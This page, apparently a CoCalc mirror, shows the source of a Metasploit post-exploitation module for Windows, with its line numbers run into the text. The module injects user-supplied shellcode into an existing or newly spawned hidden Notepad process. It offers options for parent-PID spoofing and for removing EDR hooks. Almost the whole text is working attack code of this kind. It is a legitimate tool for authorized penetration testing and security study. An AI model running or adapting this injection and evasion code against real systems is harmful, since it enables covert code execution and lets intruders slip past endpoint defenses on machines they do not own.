CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/shellcode_inject.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Common7include Msf::Post::Windows::Process89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Manage Memory Shellcode Injection Module',14'Description' => %q{15This module will inject into the memory of a process a specified shellcode.16},17'License' => MSF_LICENSE,18'Author' => [ 'phra <https://iwantmore.pizza>' ],19'Platform' => [ 'win' ],20'SessionTypes' => [ 'meterpreter' ],21'Compat' => {22'Meterpreter' => {23'Commands' => %w[24stdapi_sys_config_getenv25stdapi_sys_process_attach26stdapi_sys_process_execute27stdapi_sys_process_thread_create28]29}30}31)32)3334register_options(35[36OptPath.new('SHELLCODE', [true, 'Path to the shellcode to execute']),37OptInt.new('PID', [false, 'Process Identifier of process to inject the shellcode. (0 = new process)', 0]),38OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)', 0]),39OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', false]),40OptBool.new('INTERACTIVE', [true, 'Interact with the process', false]),41OptBool.new('HIDDEN', [true, 'Spawn an hidden process', true]),42OptBool.new('AUTOUNHOOK', [true, 'Auto remove EDRs hooks', false]),43OptInt.new('WAIT_UNHOOK', [true, 'Seconds to wait for unhook to be executed', 5]),44OptEnum.new('BITS', [true, 'Set architecture bits', '64', ['32', '64']])45]46)47end4849# Run Method for when run command is issued50def run51# syinfo is only on meterpreter sessions52print_status("Running module against #{sysinfo['Computer']}") if !sysinfo.nil?5354# Set variables55shellcode = File.binread(datastore['SHELLCODE'])56pid = datastore['PID']57ppid = datastore['PPID']58bits = datastore['BITS']59p = nil60if bits == '64'61bits = ARCH_X6462else63bits = ARCH_X8664end6566# prelim check67if (client.arch == ARCH_X86) && (@payload_arch == ARCH_X64)68fail_with(Failure::BadConfig, 'Cannot inject a 64-bit payload into any process on a 32-bit OS')69end7071if (datastore['PPID'] != 0) && (datastore['PID'] != 0)72print_error('PID and PPID are mutually exclusive')73return false74end7576# Start Notepad if Required77if pid == 078if (ppid != 0) && !has_pid?(ppid)79print_error("Process #{ppid} was not found")80return false81elsif ppid != 082print_status("Spoofing PPID #{ppid}")83end8485notepad_pathname = get_notepad_pathname(bits, client.sys.config.getenv('windir'), client.arch)86vprint_status("Starting #{notepad_pathname}")87proc = client.sys.process.execute(notepad_pathname, nil, {88'Hidden' => datastore['HIDDEN'],89'Channelized' => datastore['CHANNELIZED'],90'Interactive' => datastore['INTERACTIVE'],91'ParentPid' => datastore['PPID']92})93print_status("Spawned Notepad process #{proc.pid}")94else95if datastore['CHANNELIZED'] && datastore['PID'] != 096fail_with(Failure::BadConfig, "It's not possible to retrieve output when injecting existing processes!")97elsif datastore['CHANNELIZED'] && datastore['PPID'] != 098fail_with(Failure::BadConfig, "It's not possible to retrieve output when using PPID spoofing!")99end100unless has_pid?(pid)101print_error("Process #{pid} was not found")102return false103end104begin105proc = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)106rescue Rex::Post::Meterpreter::RequestError => e107print_error(e.to_s)108fail_with(Failure::NoAccess, "Failed to open pid #{pid.to_i}")109end110print_status("Opening existing process #{proc.pid}")111end112113# Check114if (bits == ARCH_X64) && (client.arch == ARCH_X86)115print_error('You are trying to inject to a x64 process from a x86 version of Meterpreter.')116print_error('Migrate to an x64 process and try again.')117return false118end119if arch_check(bits, proc.pid)120if datastore['AUTOUNHOOK']121print_status('Executing unhook')122print_status("Waiting #{datastore['WAIT_UNHOOK']} seconds for unhook Reflective DLL to be executed...")123unless inject_unhook(proc, bits, datastore['WAIT_UNHOOK'])124fail_with(Failure::BadConfig, 'Unknown target arch; unable to assign unhook dll')125end126end127begin128inject(shellcode, proc)129rescue ::Exception => e130print_error("Failed to inject Payload to #{proc.pid}!")131print_error(e.to_s)132end133else134fail_with(Failure::BadConfig, 'Arch mismatch between shellcode and process!')135end136end137138def inject(shellcode, proc)139mem = inject_into_process(proc, shellcode)140proc.thread.create(mem, 0)141print_good("Successfully injected payload into process: #{proc.pid}")142if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0143print_status('Interacting')144client.console.interact_with_channel(proc.channel)145elsif datastore['CHANNELIZED'] && datastore['PID'] == 0146print_status('Retrieving output')147data = proc.channel.read148print_line(data) if data149end150end151end152153154